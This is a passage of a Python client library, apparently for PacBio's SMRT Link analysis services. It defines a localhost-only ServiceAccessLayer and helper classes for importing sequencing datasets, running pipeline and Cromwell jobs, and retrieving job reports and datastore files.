return [JobEntryPoint.from_d(i) for i in d]
def _get_all_report_attributes(sal_get_reports_func, sal_get_reports_details_func, job_id):
"""Util func for getting report Attributes
Note, this assumes that only one report type has been created. This is
probably not a great idea. Should re-evaluate this.
"""
report_datafiles = sal_get_reports_func(job_id)
report_uuids = [list(r.values())[0].uuid for r in report_datafiles]
reports = [sal_get_reports_details_func(job_id, r_uuid) for r_uuid in report_uuids]
all_report_attributes = {}
for r in reports:
for x in r['attributes']:
all_report_attributes[x['id']] = x['value']
return all_report_attributes
def _to_relative_tasks_url(job_type):
def wrapper(job_id_or_uuid):
return "/".join([ServiceAccessLayer.ROOT_JOBS, job_type, str(job_id_or_uuid), "tasks"])
return wrapper
def _show_deprecation_warning(msg):
if "PB_TEST_MODE" not in os.environ:
warnings.simplefilter('once', DeprecationWarning)
warnings.warn(msg, DeprecationWarning)
warnings.simplefilter('default', DeprecationWarning) # reset filte
class ServiceAccessLayer(object): # pragma: no cover
"""
General Client Access Layer for interfacing with the job types on
SMRT Link Analysis Services. This API only supports insecure (HTTP)
access to localhost.
As of 10-02-2018, this should only be used (minimally) for internal purposes. All
access to the Services should be done via SmrtLinkAuthClient.
"""
ROOT_SL = "/smrt-link"
ROOT_JM = ROOT_SL + "/job-manager"
ROOT_JOBS = ROOT_JM + "/jobs"
ROOT_MJOBS = ROOT_JM + "/multi-jobs"
ROOT_RUNS = ROOT_SL + "/runs"
ROOT_SAMPLES = ROOT_SL + "/samples"
ROOT_DS = "/smrt-link/datasets"
ROOT_PT = '/smrt-link/resolved-pipeline-templates'
# in sec when blocking to run a job
JOB_DEFAULT_TIMEOUT = 60 * 30
def __init__(self, base_url, port, debug=False, sleep_time=2):
"""
:param base_url: base url of the SL Server. This MUST be either 'localhost' or 'http://localhost'
:param port: port of the SL server
:param debug: set improved debugging output on Services request failures
:param sleep_time: sleep time (in seconds) between polling for job status
"""
self.base_url = self._to_base_url(base_url)
self.port = port
# This will display verbose details with respect to the failed request
self.debug = debug
self._sleep_time = sleep_time
if self.__class__.__name__ == "ServiceAccessLayer":
_show_deprecation_warning("Please use the SmrtLinkAuthClient', direct localhost access is not publicly supported")
def _get_headers(self):
return Constants.HEADERS
def _to_base_url(self, h):
if h not in {"http://localhost", "localhost"}:
raise NotImplementedError("This API only supports HTTP connections to localhost")
prefix = "http://"
return h if h.startswith(prefix) else prefix + h
@property
def uri(self):
return "{b}:{u}".format(b=self.base_url, u=self.port)
def _to_url(self, rest):
return _to_url(self.uri, rest)
def __repr__(self):
return "<{k} {u} >".format(k=self.__class__.__name__, u=self.uri)
def to_summary(self):
"""
Returns a summary of System status, DataSets, and Jobs in the system
:rtype: str
"""
return to_sal_summary(self)
def get_status(self):
"""Get status of the server
:rtype: dict
"""
# This should be converted to a concrete typed object
return _process_rget(_to_url(self.uri, "/status"),
headers=self._get_headers())
def get_job_by_type_and_id(self, job_type, job_id):
return _process_rget_with_job_transform_or_none(_to_url(self.uri, "{p}/{t}/{i}".format(i=job_id, t=job_type, p=ServiceAccessLayer.ROOT_JOBS)), headers=self._get_headers())
def get_job_by_id(self, job_id):
"""Get a Job by int id"""
# FIXME. Make this an internal method It's ambiguous which job type type you're asking for
return _process_rget_with_job_transform_or_none(_to_url(self.uri, "{r}/{i}".format(i=job_id, r=ServiceAccessLayer.ROOT_JOBS)), headers=self._get_headers())
def _get_job_resource_type(self, job_type, job_id, resource_type_id):
# grab the datastore or the reports
_d = dict(t=job_type, i=job_id, r=resource_type_id, p=ServiceAccessLayer.ROOT_JOBS)
return _process_rget_with_job_transform_or_none(_to_url(self.uri, "{p}/{t}/{i}/{r}".format(**_d)), headers=self._get_headers())
def _get_job_resource_type_with_transform(self, job_type, job_id, resource_type_id, transform_func):
_d = dict(t=job_type, i=job_id, r=resource_type_id, p=ServiceAccessLayer.ROOT_JOBS)
return _process_rget_or_none(transform_func)(_to_url(self.uri, "{p}/{t}/{i}/{r}".format(**_d)), headers=self._get_headers())
def _get_jobs_by_job_type(self, job_type, query=None):
base_url = "{p}/{t}".format(t=job_type, p=ServiceAccessLayer.ROOT_JOBS)
if query is not None:
base_url = "".join([base_url, "?", query])
return _process_rget_with_jobs_transform(_to_url(self.uri, base_url),
headers=self._get_headers())
def get_multi_analysis_jobs(self):
return _process_rget_with_jobs_transform(_to_url(self.uri, "{p}/{t}".format(t="multi-analysis", p=ServiceAccessLayer.ROOT_MJOBS)), headers=self._get_headers())
def get_multi_analysis_job_by_id(self, int_or_uuid):
return _process_rget_with_job_transform_or_none(_to_url(self.uri, "{p}/{t}/{i}".format(t="multi-analysis", p=ServiceAccessLayer.ROOT_MJOBS, i=int_or_uuid)), headers=self._get_headers())
def get_multi_analysis_job_children_by_id(self, multi_job_int_or_uuid):
return _process_rget_with_jobs_transform(
_to_url(self.uri, "{p}/{t}/{i}/jobs".format(t="multi-analysis", p=ServiceAccessLayer.ROOT_MJOBS, i=multi_job_int_or_uuid)),
headers=self._get_headers())
def get_all_analysis_jobs(self):
return _process_rget_with_jobs_transform(
_to_url(self.uri, "{p}/analysis-jobs".format(
p=ServiceAccessLayer.ROOT_JM)),
headers=self._get_headers())
def get_analysis_jobs(self, query=None):
return self._get_jobs_by_job_type(JobTypes.ANALYSIS, query=query)
def get_pbsmrtpipe_jobs(self, query=None):
""":rtype: list[ServiceJob]"""
_show_deprecation_warning("Please use get_analysis_jobs() instead")
return self.get_analysis_jobs(query=query)
def get_cromwell_jobs(self):
""":rtype: list[ServiceJob]"""
return self._get_jobs_by_job_type(JobTypes.CROMWELL)
def get_import_dataset_jobs(self):
""":rtype: list[ServiceJob]"""
return self._get_jobs_by_job_type(JobTypes.IMPORT_DS)
def get_merge_dataset_jobs(self):
""":rtype: list[ServiceJob]"""
return self._get_jobs_by_job_type(JobTypes.MERGE_DS)
def get_fasta_convert_jobs(self):
""":rtype: list[ServiceJob]"""
self._get_jobs_by_job_type(JobTypes.CONVERT_FASTA)
def get_analysis_job_by_id(self, job_id):
"""Get an Analysis job by id or UUID or return None
:rtype: ServiceJob
"""
return self.get_job_by_type_and_id(JobTypes.ANALYSIS, job_id)
def get_import_job_by_id(self, job_id):
return self.get_job_by_type_and_id(JobTypes.IMPORT_DS, job_id)
def get_analysis_job_datastore(self, job_id):
"""Get DataStore output from (pbsmrtpipe) analysis job"""
# this doesn't work the list is sli
return self._get_job_resource_type_with_transform("pbsmrtpipe", job_id, ServiceResourceTypes.DATASTORE, _to_datastore)
def _to_dsf_id_url(self, job_id, dsf_uuid):
u = "/".join([ServiceAccessLayer.ROOT_JOBS, "pbsmrtpipe", str(job_id), ServiceResourceTypes.DATASTORE, dsf_uuid])
return _to_url(self.uri, u)
def get_analysis_job_datastore_file(self, job_id, dsf_uuid):
return _process_rget_or_none(_to_ds_file)(self._to_dsf_id_url(job_id, dsf_uuid), headers=self._get_headers())
def get_analysis_job_datastore_file_download(self, job_id, dsf_uuid, output_file=None):
"""
Download an DataStore file to an output file
:param job_id:
:param dsf_uuid:
:param output_file: if None, the file name from the server (content-disposition) will be used.
:return:
"""
url = "{}/download".format(self._to_dsf_id_url(job_id, dsf_uuid))
dsf = self.get_analysis_job_datastore_file(job_id, dsf_uuid)
default_name = "download-job-{}-dsf-{}".format(job_id, dsf_uuid)
if dsf is not None:
r = requests.get(url, stream=True, verify=False, headers=self._get_headers())
if output_file is None:
try:
# 'attachment; filename="job-106-be2b5106-91dc-4ef9-b199-f1481f88b7e4-file-024.subreadset.xml'
raw_header = r.headers.get('content-disposition')
local_filename = raw_header.split("filename=")[-1].replace('"', '')
except (TypeError, IndexError, KeyError, AttributeError):
local_filename = default_name
else:
local_filename = output_file
with open(local_filename, 'wb') as f:
for chunk in r.iter_content(chunk_size=1024):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
r.close()
return local_filename
else:
# This should probably return None to be consistent with the current API
raise KeyError("Unable to get DataStore file {} from Job {}".format(dsf_uuid, job_id))
def get_analysis_job_reports(self, job_id):
"""Get list of DataStore ReportFile types output from (pbsmrtpipe) analysis job"""
return self._get_job_resource_type_with_transform(JobTypes.ANALYSIS, job_id, ServiceResourceTypes.REPORTS, _to_job_report_files)
def get_analysis_job_reports_objs(self, job_id):
"""
Get a List of Report Instances
:param job_id:
:rtype list[Report]
:return: List of Reports
"""
job_reports = self.get_analysis_job_reports(job_id)
return [self.get_analysis_job_report_obj(job_id, x['dataStoreFile'].uuid) for x in job_reports]
def __get_report_d(self, job_id, report_uuid, processor_func):
_d = dict(t=JobTypes.ANALYSIS, i=job_id, r=ServiceResourceTypes.REPORTS, p=ServiceAccessLayer.ROOT_JOBS,
u=report_uuid)
u = "{p}/{t}/{i}/{r}/{u}".format(**_d)
return _process_rget_or_none(processor_func)(_to_url(self.uri, u), headers=self._get_headers())
def get_analysis_job_report_details(self, job_id, report_uuid):
return self.__get_report_d(job_id, report_uuid, lambda x: x)
def get_analysis_job_report_obj(self, job_id, report_uuid):
"""
Fetch a SMRT Link Report Instance from a Job Id and Report UUID
There's inconsistencies in the API, hence the naming of the method is a bit verbose.
:rtype Report
"""
return self.__get_report_d(job_id, report_uuid, load_report_from)
def get_analysis_job_report_attrs(self, job_id):
"""Return a dict of all the Report Attributes"""
return _get_all_report_attributes(self.get_analysis_job_reports, self.get_analysis_job_report_details, job_id)
def get_import_job_reports(self, job_id):
return self._get_job_resource_type_with_transform(JobTypes.IMPORT_DS, job_id, ServiceResourceTypes.REPORTS, _to_job_report_files)
def get_import_job_report_details(self, job_id, report_uuid):
# It would have been better to return a Report instance, not raw json
_d = dict(t=JobTypes.IMPORT_DS, i=job_id, r=ServiceResourceTypes.REPORTS, p=ServiceAccessLayer.ROOT_JOBS, u=report_uuid)
return _process_rget_or_none(lambda x: x)(_to_url(self.uri, "{p}/{t}/{i}/{r}/{u}".format(**_d)), headers=self._get_headers())
def get_import_job_report_attrs(self, job_id):
"""Return a dict of all the Report Attributes"""
return _get_all_report_attributes(self.get_import_job_reports, self.get_import_job_report_details, job_id)
def get_analysis_job_entry_points(self, job_id):
return self._get_job_resource_type_with_transform(JobTypes.ANALYSIS, job_id, ServiceResourceTypes.ENTRY_POINTS, _to_entry_points)
def get_import_dataset_job_datastore(self, job_id):
"""Get a List of Service DataStore files from an import DataSet job"""
return self._get_job_resource_type(JobTypes.IMPORT_DS, job_id, ServiceResourceTypes.DATASTORE)
def get_merge_dataset_job_datastore(self, job_id):
return self._get_job_resource_type(JobTypes.MERGE_DS, job_id, ServiceResourceTypes.DATASTORE)
def _import_dataset(self, dataset_type, path, avoid_duplicate_import=False):
# This returns a job resource
url = self._to_url("{p}/{x}".format(x=JobTypes.IMPORT_DS, p=ServiceAccessLayer.ROOT_JOBS))
return _import_dataset_by_type(dataset_type)(url, path, headers=self._get_headers(), avoid_duplicate_import=avoid_duplicate_import)
def run_import_dataset_by_type(self, dataset_type, path_to_xml,
avoid_duplicate_import=False):
job_or_error = self._import_dataset(
dataset_type,
path_to_xml,
avoid_duplicate_import=avoid_duplicate_import)
custom_err_msg = "Import {d} {p}".format(p=path_to_xml, d=dataset_type)
job_id = _job_id_or_error(job_or_error, custom_err_msg=custom_err_msg)
return _block_for_job_to_complete(self, job_id, sleep_time=self._sleep_time)
def _run_import_and_block(self, func, path, time_out=None):
# func while be self.import_dataset_X
job_or_error = func(path)
custom_err_msg = "Import {p}".format(p=path)
job_id = _job_id_or_error(job_or_error, custom_err_msg=custom_err_msg)
return _block_for_job_to_complete(self, job_id, time_out=time_out,
sleep_time=self._sleep_time)
def import_dataset_subread(self, path):
return self._import_dataset(FileTypes.DS_SUBREADS, path)
def run_import_dataset_subread(self, path, time_out=10):
return self._run_import_and_block(self.import_dataset_subread, path, time_out=time_out)
def import_dataset_hdfsubread(self, path):
return self._import_dataset(FileTypes.DS_SUBREADS_H5, path)
def run_import_dataset_hdfsubread(self, path, time_out=10):
return self._run_import_and_block(self.import_dataset_hdfsubread, path, time_out=time_out)
def import_dataset_reference(self, path):
return self._import_dataset(FileTypes.DS_REF, path)
def run_import_dataset_reference(self, path, time_out=10):
return self._run_import_and_block(self.import_dataset_reference, path, time_out=time_out)
def import_dataset_barcode(self, path):
return self._import_dataset(FileTypes.DS_BARCODE, path)
def run_import_dataset_barcode(self, path, time_out=10):
return self._run_import_and_block(self.import_dataset_barcode, path, time_out=time_out)
def run_import_local_dataset(self, path, avoid_duplicate_import=False):
"""Import a file from FS that is local to where the services are running
Returns a JobResult instance
:rtype: JobResult
"""
dataset_meta_type = get_dataset_metadata(path)
result = self.get_dataset_by_uuid(dataset_meta_type.uuid,
ignore_errors=True)
if result is None:
log.info("Importing dataset {p}".format(p=path))
job_result = self.run_import_dataset_by_type(dataset_meta_type.metatype, path, avoid_duplicate_import=avoid_duplicate_import)
log.info("Confirming database update")
# validation 1: attempt to retrieve dataset info
result_new = self.get_dataset_by_uuid(dataset_meta_type.uuid)
if result_new is None:
raise JobExeError(("Dataset {u} was imported but could " +
"not be retrieved; this may indicate " +
"XML schema errors.").format(
u=dataset_meta_type.uuid))
return job_result
else:
log.info("{f} already imported. Skipping importing. {r}".format(r=result, f=dataset_meta_type.metatype))
# need to clean this up
return JobResult(self.get_job_by_id(result['jobId']), 0, "")
def get_dataset_children_jobs(self, dataset_id):
"""
Get a List of Children Jobs for the DataSet
:param dataset_id: DataSet Int or UUID
:type dataset_id: int | string
:rtype list[ServiceJob]
"""
return _process_rget_with_jobs_transform(
_to_url(self.uri, "{t}/datasets/{i}/jobs".format(t=ServiceAccessLayer.ROOT_SL, i=dataset_id)), headers=self._get_headers())
def get_job_types(self):
u = _to_url(self.uri, "{}/{}".format(ServiceAccessLayer.ROOT_JM, "job-types"))
return _process_rget(u, headers=self._get_headers())
def get_dataset_types(self):
"""Get a List of DataSet Types"""
u = _to_url(self.uri, "{}/{}".format(ServiceAccessLayer.ROOT_SL, "dataset-types"))
return _process_rget(u, headers=self._get_headers())
def get_dataset_by_uuid(self, int_or_uuid, ignore_errors=False):
"""The recommend model is to look up DataSet type by explicit MetaType
Returns None if the dataset was not found
"""
return _process_rget_or_none(_null_func, ignore_errors=ignore_errors)(
_to_url(self.uri, "{p}/{i}".format(i=int_or_uuid,
p=ServiceAccessLayer.ROOT_DS)),
headers=self._get_headers())
def get_dataset_by_id(self, dataset_type, int_or_uuid):
"""Get a Dataset using the DataSetMetaType and (int|uuid) of the dataset"""
ds_endpoint = _get_endpoint_or_raise(dataset_type)
return _process_rget(_to_url(self.uri, "{p}/{t}/{i}".format(t=ds_endpoint, i=int_or_uuid, p=ServiceAccessLayer.ROOT_DS)), headers=self._get_headers())
def _get_dataset_details_by_id(self, dataset_type, int_or_uuid):
"""
Get a Dataset Details (XML converted to JSON via webservices
using the DataSetMetaType and (int|uuid) of the dataset
"""
# FIXME There's some inconsistencies in the interfaces with regards to returning None or raising
ds_endpoint = _get_endpoint_or_raise(dataset_type)
return _process_rget(_to_url(self.uri, "{p}/{t}/{i}/details".format(t=ds_endpoint, i=int_or_uuid, p=ServiceAccessLayer.ROOT_DS)), headers=self._get_headers())
def _get_datasets_by_type(self, dstype):
return _process_rget(_to_url(self.uri, "{p}/{i}".format(i=dstype, p=ServiceAccessLayer.ROOT_DS)), headers=self._get_headers())
def get_subreadset_by_id(self, int_or_uuid):
return self.get_dataset_by_id(FileTypes.DS_SUBREADS, int_or_uuid)
def get_subreadset_details_by_id(self, int_or_uuid):
return self._get_dataset_details_by_id(FileTypes.DS_SUBREADS, int_or_uuid)
def get_subreadsets(self):
return self._get_datasets_by_type("subreads")
def get_hdfsubreadset_by_id(self, int_or_uuid):
return self.get_dataset_by_id(FileTypes.DS_SUBREADS_H5, int_or_uuid)
def get_hdfsubreadset_details_by_id(self, int_or_uuid):
return self._get_dataset_details_by_id(FileTypes.DS_SUBREADS_H5, int_or_uuid)
def get_hdfsubreadsets(self):
return self._get_datasets_by_type("hdfsubreads")
def get_referenceset_by_id(self, int_or_uuid):
return self.get_dataset_by_id(FileTypes.DS_REF, int_or_uuid)
def get_referenceset_details_by_id(self, int_or_uuid):
return self._get_dataset_details_by_id(FileTypes.DS_REF, int_or_uuid)
def get_referencesets(self):
return self._get_datasets_by_type("references")
def get_barcodeset_by_id(self, int_or_uuid):
return self.get_dataset_by_id(FileTypes.DS_BARCODE, int_or_uuid)
def get_barcodeset_details_by_id(self, int_or_uuid):
return self._get_dataset_details_by_id(FileTypes.DS_BARCODE, int_or_uuid)
def get_barcodesets(self):
return self._get_datasets_by_type("barcodes")
def get_alignmentset_by_id(self, int_or_uuid):
return self.get_dataset_by_id(FileTypes.DS_ALIGN, int_or_uuid)
def get_alignmentset_details_by_id(self, int_or_uuid):
return self._get_dataset_details_by_id(FileTypes.DS_ALIGN, int_or_uuid)
def get_ccsreadset_by_id(self, int_or_uuid):
return self.get_dataset_by_id(FileTypes.DS_CCS, int_or_uuid)
def get_ccsreadset_details_by_id(self, int_or_uuid):
return self._get_dataset_details_by_id(FileTypes.DS_CCS, int_or_uuid)
def get_ccsreadsets(self):
return self._get_datasets_by_type("ccsreads")
def get_alignmentsets(self):
return self._get_datasets_by_type("alignments")
def import_fasta(self, fasta_path, name, organism, ploidy):
"""Convert fasta file to a ReferenceSet and Import. Returns a Job """
d = dict(path=fasta_path,
name=name,
organism=organism,
ploidy=ploidy)
return _process_rpost_with_transform(ServiceJob.from_d)(self._to_url("{p}/{t}".format(p=ServiceAccessLayer.ROOT_JOBS, t=JobTypes.CONVERT_FASTA)), d, headers=self._get_headers())
def run_import_fasta(self, fasta_path, name, organism, ploidy, time_out=JOB_DEFAULT_TIMEOUT):
"""Import a Reference into a Block"""""
job_or_error = self.import_fasta(fasta_path, name, organism, ploidy)
_d = dict(f=fasta_path, n=name, o=organism, p=ploidy)
custom_err_msg = "Fasta-convert path:{f} name:{n} organism:{o} ploidy:{p}".format(**_d)
job_id = _job_id_or_error(job_or_error, custom_err_msg=custom_err_msg)
return _block_for_job_to_complete(self, job_id, time_out=time_out,
sleep_time=self._sleep_time)
def create_logger_resource(self, idx, name, description):
_d = dict(id=idx, name=name, description=description)
return _process_rpost(_to_url(self.uri, "/smrt-base/loggers"), _d, headers=self._get_headers())
def log_progress_update(self, job_type_id, job_id, message, level, source_id):
"""This is the generic job logging mechanism"""
_d = dict(message=message, level=level, sourceId=source_id)
return _process_rpost(_to_url(self.uri, "{p}/{t}/{i}/log".format(t=job_type_id, i=job_id, p=ServiceAccessLayer.ROOT_JOBS)), _d, headers=self._get_headers())
def get_pipeline_template_by_id(self, pipeline_template_id):
return _process_rget(_to_url(self.uri, "{p}/{i}".format(i=pipeline_template_id, p=ServiceAccessLayer.ROOT_PT)), headers=self._get_headers())
def create_by_pipeline_template_id(self,
name,
pipeline_template_id,
epoints,
task_options=(),
workflow_options=(),
tags=()):
"""Creates and runs a pbsmrtpipe pipeline by pipeline template id
:param tags: Tags should be a set of strings
"""
if pipeline_template_id.startswith("pbsmrtpipe"):
raise NotImplementedError("pbsmrtpipe is no longer supported")
# sanity checking to see if pipeline is valid
_ = self.get_pipeline_template_by_id(pipeline_template_id)
seps = [dict(entryId=e.entry_id, fileTypeId=e.dataset_type, datasetId=e.resource) for e in epoints]
def _to_o(opt_id, opt_value, option_type_id):
return dict(optionId=opt_id, value=opt_value, optionTypeId=option_type_id)
task_options = list(task_options)
d = dict(name=name,
pipelineId=pipeline_template_id,
entryPoints=seps,
taskOptions=task_options,
workflowOptions=workflow_options)
# Only add the request if the non empty.
if tags:
tags_str = ",".join(list(tags))
d['tags'] = tags_str
job_type = JobTypes.ANALYSIS
raw_d = _process_rpost(_to_url(self.uri, "{r}/{p}".format(p=job_type, r=ServiceAccessLayer.ROOT_JOBS)), d, headers=self._get_headers())
return ServiceJob.from_d(raw_d)
def run_by_pipeline_template_id(self,
name,
pipeline_template_id,
epoints,
task_options=(),
workflow_options=(),
time_out=JOB_DEFAULT_TIMEOUT,
tags=(),
abort_on_interrupt=True):
"""Blocks and runs a job with a timeout"""
job_or_error = self.create_by_pipeline_template_id(
name,
pipeline_template_id,
epoints,
task_options=task_options,
workflow_options=workflow_options,
tags=tags)
_d = dict(name=name, p=pipeline_template_id, eps=epoints)
custom_err_msg = "Job {n} args: {a}".format(n=name, a=_d)
job_id = _job_id_or_error(job_or_error, custom_err_msg=custom_err_msg)
return _block_for_job_to_complete(self, job_id, time_out=time_out,
sleep_time=self._sleep_time,
abort_on_interrupt=abort_on_interrupt)
def run_cromwell_workflow(self,
name,
workflow_source,
inputs_json,
engine_options,
dependencies_zip,
time_out=JOB_DEFAULT_TIMEOUT,
tags=(),
abort_on_interrupt=True):
d = dict(
name=name,
workflowSource=workflow_source,
inputsJson=inputs_json,
engineOptions=engine_options,
dependenciesZip=dependencies_zip)
if tags:
tags_str = ",".join(list(tags))
d['tags'] = tags_str
raw_d = _process_rpost(_to_url(self.uri, "{r}/{p}".format(p=JobTypes.CROMWELL, r=ServiceAccessLayer.ROOT_JOBS)), d, headers=self._get_headers())
job = ServiceJob.from_d(raw_d)
return _block_for_job_to_complete(self, job.id, time_out=time_out,
sleep_time=self._sleep_time,
abort_on_interrupt=abort_on_interrupt)
def terminate_job(self, job):
"""
POST a terminate request appropriate to the job type. Currently only
supported for pbsmrtpipe, cromwell, and analysis job types.
"""
log.warn("Terminating job {i} ({u})".format(i=job.id, u=job.uuid))
if job.external_job_id is not None:
log.warn("Will abort Cromwell workflow %s", job.external_job_id)
return _process_rpost(
_to_url(self.uri, "{r}/{p}/{i}/terminate".format(
p=job.job_type,
r=ServiceAccessLayer.ROOT_JOBS,
i=job.id)),
{},
headers=self._get_headers())
def terminate_job_id(self, job_id):
job = _get_job_by_id_or_raise(self, job_id, KeyError)
return self.terminate_job(job)
def resume_job(self,
job_id,
time_out=JOB_DEFAULT_TIMEOUT,
abort_on_interrupt=True):
job = _get_job_by_id_or_raise(self, job_id, KeyError)
if job.state in JobStates.ALL_COMPLETED:
return JobResult(job, 0, "")
return _block_for_job_to_complete(self, job.id, time_out=time_out,
sleep_time=self._sleep_time,
abort_on_interrupt=abort_on_interrupt)
def get_analysis_job_tasks(self, job_id_or_uuid):
"""Get all the Task associated with a Job by UUID or Int Id"""
job_url = self._to_url(_to_relative_tasks_url(JobTypes.ANALYSIS)(job_id_or_uuid))
return _process_rget_with_transform(_transform_job_tasks)(job_url, headers=self._get_headers())
def get_import_job_tasks(self, job_id_or_uuid):
# this is more for testing purposes
job_url = self._to_url(_to_relative_tasks_url(JobTypes.IMPORT_DS)(job_id_or_uuid))
return _process_rget_with_transform(_transform_job_tasks)(job_url, headers=self._get_headers())
def get_manifests(self):
u = self._to_url("{}/manifests".format(ServiceAccessLayer.ROOT_SL))
return _process_rget_with_transform(_null_func)(u, headers=self._get_headers())
def get_manifest_by_id(self, ix):
u = self._to_url("{}/manifests/{}".format(ServiceAccessLayer.ROOT_SL, ix))
return _process_rget_or_none(_null_func)(u, headers=self._get_headers())
def get_runs(self):
u = self._to_url("{}".format(ServiceAccessLayer.ROOT_RUNS))
return _process_rget_with_transform(_null_func)(u, headers=self._get_headers())
def get_run_details(self, run_uuid):
u = self._to_url("{}/{}".format(ServiceAccessLayer.ROOT_RUNS, run_uuid))
return _process_rget_or_none(_null_func)(u, headers=self._get_headers())
def get_run_collections(self, run_uuid):
u = self._to_url("{}/{}/collections".format(ServiceAccessLayer.ROOT_RUNS, run_uuid))
return _process_rget_with_transform(_null_func)(u, headers=self._get_headers())
def get_run_collection(self, run_uuid, collection_uuid):
u = self._to_url("{}/{}/collections/{}".format(ServiceAccessLayer.ROOT_RUNS, run_uuid, collection_uuid))
return _process_rget_or_none(_null_func)(u, headers=self._get_headers())
def get_samples(self):
u = self._to_url("{}/samples".format(ServiceAccessLayer.ROOT_SL, ))
return _process_rget_with_transform(_null_func)(u, headers=self._get_headers())
def get_sample_by_id(self, sample_uuid):
u = self._to_url("{}/samples/{}".format(ServiceAccessLayer.ROOT_SL, sample_uuid))
return _process_rget_or_none(_null_func)(u, headers=self._get_headers())
def submit_multi_job(self, job_options):
u = self._to_url("{}/multi-analysis".format(ServiceAccessLayer.ROOT_MJOBS))
return _process_rpost_with_transform(ServiceJob.from_d)(u, job_options, headers=self._get_headers())
def __run_and_ignore_errors(f, warn_message):
"""
Black hole ignoring exceptions from a func with no-args and
logging the error has a warning.
"""
try:
return f()
except Exception as e:
log.warn(warn_message + " {e}".format(e=e))
def _run_func(f, warn_message, ignore_errors=True):
if ignore_errors:
return __run_and_ignore_errors(f, warn_message)
else:
return f()
def log_pbsmrtpipe_progress(total_url, message, level, source_id, ignore_errors=True, headers=None): # pragma: no cover
"""Log the status of a pbsmrtpipe to SMRT Server"""
# Keeping this as public to avoid breaking pbsmrtpipe. The
# new public interface should be the JobServiceClient
# Need to clarify the model here. Trying to pass the most minimal
# data necessary to pbsmrtpipe.
_d = dict(message=message, level=level, sourceId=source_id)
warn_message = "Failed Request to {u} data: {d}".format(u=total_url, d=_d)
def f():
return _process_rpost(total_url, _d, headers=headers)
return _run_func(f, warn_message, ignore_errors=ignore_errors)
def add_datastore_file(total_url, datastore_file, ignore_errors=True, headers=None): # pragma: no cover
"""Add datastore to SMRT Server
:type datastore_file: DataStoreFile
"""
# Keeping this as public to avoid breaking pbsmrtpipe. The
# new public interface should be the JobServiceClient
_d = datastore_file.to_dict()
warn_message = "Failed Request to {u} data: {d}.".format(u=total_url, d=_d)
def f():
return _process_rpost(total_url, _d, headers=headers)
return _run_func(f, warn_message, ignore_errors=ignore_errors)
def _create_job_task(job_tasks_url, create_job_task_record, ignore_errors=True, headers=None): # pragma: no cover
"""
:type create_job_task_record: CreateJobTaskRecord
:rtype: JobTask
"""
warn_message = "Unable to create Task {c}".format(c=repr(create_job_task_record))
def f():
return _process_rpost_with_transform(JobTask.from_d)(job_tasks_url, create_job_task_record.to_dict(), headers=headers)
return _run_func(f, warn_message, ignore_errors)
def _update_job_task_state(task_url, update_job_task_record, ignore_errors=True, headers=None): # pragma: no cover
"""
:type update_job_task_record: UpdateJobTaskRecord
:rtype: JobTask
"""
warn_message = "Unable to update Task {c}".format(c=repr(update_job_task_record))
def f():
return _process_rput_with_transform(JobTask.from_d)(task_url, update_job_task_record.to_dict(), headers=headers)
return _run_func(f, warn_message, ignore_errors)
def _update_datastore_file(datastore_url, uuid, path, file_size, set_is_active,
ignore_errors=True, headers=None): # pragma: no cover
warn_message = "Unable to update datastore file {u}".format(u=uuid)
total_url = "{b}/{u}".format(b=datastore_url, u=uuid)
d = {"fileSize": file_size, "path": path, "isActive": set_is_active}
def f():
return _process_rput(total_url, d, headers=headers)
return _run_func(f, warn_message, ignore_errors)
class CreateJobTaskRecord(object):
def __init__(self, task_uuid, task_id, task_type_id, name, state, created_at=None):
self.task_uuid = task_uuid
self.task_id = task_id
self.task_type_id = task_type_id
self.name = name
# this must be consistent with the EngineJob states in the scala code
self.state = state
# Note, the created_at timestamp must have the form
# 2016-02-18T23:24:46.569Z
# or
# 2016-02-18T15:24:46.569-08:00
self.created_at = datetime.datetime.now(pytz.utc) if created_at is None else created_at
def __repr__(self):
_d = dict(k=self.__class__.__name__,
u=self.task_uuid,
i=self.task_id,
n=self.name,
s=self.state)
return "<{k} uuid:{u} ix:{i} state:{s} name:{n} >".format(**_d)
def to_dict(self):
return dict(uuid=self.task_uuid,
taskId=self.task_id,
taskTypeId=self.task_type_id,
name=self.name,
state=self.state,
createdAt=self.created_at.isoformat())
class UpdateJobTaskRecord(object):
def __init__(self, task_uuid, state, message, error_message=None):
""":type error_message: str | None"""
self.task_uuid = task_uuid
self.state = state
self.message = message
# detailed error message (e.g., terse stack trace)
self.error_message = error_message
@staticmethod
def from_error(task_uuid, state, message, error_message):
# require an detailed error message
return UpdateJobTaskRecord(task_uuid, state,
message,
error_message=error_message)
def __repr__(self):
_d = dict(k=self.__class__.__name__,
i=self.task_uuid,
s=self.state)
return "<{k} i:{i} state:{s} >".format(**_d)
def to_dict(self):
_d = dict(uuid=self.task_uuid,
state=self.state,
message=self.message)
# spray API is a little odd here. it will complain about
# Expected String as JsString, but got null
# even though the model is Option[String]
if self.error_message is not None:
_d['errorMessage'] = self.error_message
return _d
class JobServiceClient(object): # pragma: no cover
# Keeping this class private. It should only be used from pbsmrtpipe
def __init__(self, job_root_url, ignore_errors=False):
"""
:param job_root_url: Full Root URL to the job
:type job_root_url: str
:param ignore_errors: Only log errors, don't not raise if a request fails. This is intended to be used in a fire-and-forget usecase
:type ignore_errors: bool
This hides the root location of the URL and hides
the job id (as an int or uuid)
The Url has the form:
http://localhost:8888/smrt-link/job-manager/jobs/pbsmrtpipe/1234
or
http://localhost:8888/smrt-link/job-manager/jobs/pbsmrtpipe/5d562c74-e452-11e6-8b96-3c15c2cc8f88
"""
self.job_root_url = job_root_url
self.ignore_errors = ignore_errors
def __repr__(self):
_d = dict(k=self.__class__.__name__, u=self.job_root_url)
return "<{k} Job URL:{u} >".format(**_d)
def _get_headers(self):
return Constants.HEADERS
def to_url(self, segment):
return "{i}/{s}".format(i=self.job_root_url, s=segment)
@property
def log_url(self):
return self.to_url("log")
@property
def datastore_url(self):
return self.to_url("datastore")
@property
def tasks_url(self):
return self.to_url("tasks")
def get_task_url(self, task_uuid):
"""
:param task_uuid: Task UUID
:return:
"""
return self.to_url("tasks/{t}".format(t=task_uuid))
def log_workflow_progress(self, message, level, source_id, ignore_errors=True):
return log_pbsmrtpipe_progress(self.log_url, message, level, source_id, ignore_errors=ignore_errors)
def add_datastore_file(self, datastore_file, ignore_errors=True):
return add_datastore_file(self.datastore_url, datastore_file, ignore_errors=ignore_errors)
def update_datastore_file(self, uuid, file_size=None, path=None, set_is_active=True, ignore_errors=True):
return _update_datastore_file(self.datastore_url, uuid, path, file_size, set_is_active, ignore_errors)
